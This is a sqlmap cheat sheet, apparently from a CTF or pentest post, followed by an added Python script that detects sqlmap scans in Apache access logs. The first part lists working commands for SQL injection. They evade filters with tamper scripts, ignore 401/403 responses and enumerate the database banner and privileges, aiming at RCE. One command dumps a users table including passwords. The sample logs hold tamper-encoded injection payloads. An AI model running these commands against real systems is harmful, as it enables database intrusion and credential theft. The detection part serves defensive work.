1. Send the request over HTTPS using the raw request file option (-r). Insert ":443" into the Host header so sqlmap uses HTTPS. Contents of request.txt (the body carries the parameter to test, e.g. id=1):
POST /test HTTP/1.1
Host: x.y.z:443

id=1
2. Run sqlmap with a delay between requests and route traffic through a local intercepting proxy on 127.0.0.1:8080
sqlmap -r request.txt --proxy=http://127.0.0.1:8080 --delay=0.3
3. Bypass basic filtering with tamper scripts
sqlmap -r request.txt --tamper="between,randomcase,space2comment" --proxy=http://127.0.0.1:8080 --delay=0.3
4. If the target responds with 401 Unauthorized, tell sqlmap to ignore that status code and keep testing (both option forms are accepted)
sqlmap -r request.txt --ignore-code 401 --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r request.txt --ignore-code=401,403 --proxy=http://127.0.0.1:8080 --delay=0.3
5. Retrieve the DBMS banner (version) and current user, to look up CVEs for that database version and to know which database functions are available for further exploitation (e.g. RCE (this is our goal:) or LFI etc.)
sqlmap -r request.txt -b --current-user --proxy=http://127.0.0.1:8080 --delay=0.3
/*
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
*/
6. Enumerate user privileges, databases, tables, columns and data
sqlmap -r raw.txt --dbs --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt --tables --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt --privileges --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt -T users --columns --proxy=http://127.0.0.1:8080 --delay=0.3
sqlmap -r raw.txt -T users -C flag,id,password --dump --proxy=http://127.0.0.1:8080 --delay=0.3
7. Set a per-request timestamp parameter with --eval (Python code evaluated before every request; the variable timestamp is written into the request parameter of the same name, here the current time in milliseconds plus 2000)
sqlmap -r text.txt --proxy=http://127.0.0.1:8080 --eval="import time; timestamp=int((time.time() * 1000)+2000)"
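Defender's view of the same activity, as an added example that is not part of the original post: the options above (a fixed --delay, a proxy, tamper scripts, --ignore-code) leave a recognisable shape in a web server's access log. This Python script parses constructed Apache combined-format lines (sample data, not real traffic) and flags a source for sqlmap's default User-Agent, space2comment/randomcase artifacts in the query string, a burst of 401/403 responses that a scanner ignoring those codes keeps producing, and several requests within the same second. The thresholds, IP addresses and log lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed Apache combined-format lines (sample data, not from the original post).
# 10.0.0.5 plays the scanner, 192.0.2.10 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Sep/2022:10:00:00 +0000] "GET /test?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.5 - - [30/Sep/2022:10:00:00 +0000] "GET /test?id=1%2F%2A%2A%2FaNd%2F%2A%2A%2F1%3D1 HTTP/1.1" 401 128 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.5 - - [30/Sep/2022:10:00:00 +0000] "GET /test?id=1%2F%2A%2A%2FaNd%2F%2A%2A%2F1%3D2 HTTP/1.1" 401 128 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.5 - - [30/Sep/2022:10:00:01 +0000] "GET /test?id=1%2F%2A%2A%2FaNd%2F%2A%2A%2F1%2F%2A%2A%2FbEtWeEn%2F%2A%2A%2F1%2F%2A%2A%2FaNd%2F%2A%2A%2F1 HTTP/1.1" 403 128 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.5 - - [30/Sep/2022:10:00:01 +0000] "GET /test?id=1 HTTP/1.1" 403 128 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
10.0.0.5 - - [30/Sep/2022:10:00:01 +0000] "GET /test?id=2 HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"
192.0.2.10 - - [30/Sep/2022:10:00:02 +0000] "GET /test?id=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache "combined" log format: ip ident user [ts] "method url proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Keywords whose casing the randomcase tamper scrambles; between is the tamper named on the page.
SQL_KEYWORD_RE = re.compile(r"\b(and|or|select|union|between)\b", re.I)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["url"] = unquote(rec["url"])  # the tamper output is percent-encoded on the wire
    return rec


def has_tamper_artifacts(url):
    """space2comment replaces spaces with /**/; randomcase produces aNd, bEtWeEn, ..."""
    if "/**/" in url:
        return True
    for kw in SQL_KEYWORD_RE.findall(url):
        if kw != kw.lower() and kw != kw.upper():  # mixed case, not a human-typed keyword
            return True
    return False


def analyze(log_text, burst_min=3, error_ratio=0.5, per_second_min=3):
    """Group lines by source IP and return {ip: [reasons]} for sources worth a look."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in by_ip.items():
        reasons = []
        # 1. sqlmap's default User-Agent starts with "sqlmap/" (weakest signal, easily changed)
        if any("sqlmap/" in r["ua"].lower() for r in recs):
            reasons.append("user-agent")
        # 2. tamper-script fingerprints in the query string
        if any(has_tamper_artifacts(r["url"]) for r in recs):
            reasons.append("tamper-artifacts")
        # 3. a client that keeps going through 401/403 (what --ignore-code makes sqlmap do)
        denied = sum(1 for r in recs if r["status"] in (401, 403))
        if denied >= burst_min and denied / len(recs) >= error_ratio:
            reasons.append("error-burst")
        # 4. a sub-second --delay shows up as several hits inside one log second
        per_second = defaultdict(int)
        for r in recs:
            per_second[r["ts"]] += 1
        if max(per_second.values()) >= per_second_min:
            reasons.append("request-rate")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(reasons))
```

Access logs only record the request line, so for POST requests (as in the request file above) the tamper-artifact check sees nothing; the User-Agent, status and rate signals still apply, and body inspection needs a WAF or application-level log. Treat the User-Agent match as corroboration rather than the trigger, since it is the one signal under the client's full control.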